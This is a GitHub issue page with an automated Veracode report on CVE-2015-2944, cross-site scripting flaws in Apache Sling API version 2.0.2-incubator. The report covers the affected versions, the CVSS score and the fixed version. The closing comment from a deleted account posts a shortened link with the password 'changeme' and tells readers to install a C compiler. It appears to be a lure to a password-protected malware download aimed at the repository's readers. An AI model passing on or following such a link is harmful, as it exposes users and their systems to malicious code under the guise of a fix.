julz0815 / test-action

0 stars 1 forks source link

CVE: 2015-2944 found in Apache Sling API - Version: 2.0.2-incubator [JAVA] #1165

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

Attribute Details
Library Apache Sling API
Description The Apache Sling API defines an extension to the Servlet API 2.4 to provide access to content and unified access to request parameters hiding the differences between the different methods of transferr
Language JAVA
Vulnerability Multiple Cross-site Scripting (XSS) Vulnerabilities
Vulnerability description Multiple cross-site scripting (XSS) vulnerabilities in Apache Sling API before 2.2.2 and Apache Sling Servlets Post before 2.1.2 allow remote attackers to inject arbitrary web script or HTML via the URI, related to (1) org/apache/sling/api/servlets/HtmlResponse and (2) org/apache/sling/servlets/post/HtmlResponse.
CVE 2015-2944
CVSS score 4.3
Vulnerability present in version/s 0.0-2.2.1
Found library version/s 2.0.2-incubator
Vulnerability fixed in version 2.2.2
Library latest version 2.27.6
Fix

Links:

ghost commented 2 months ago

I think this will help you. https://bit.ly/3TC7hrw Pass: changeme If you don't have the c compliator, install it.(gcc or clang)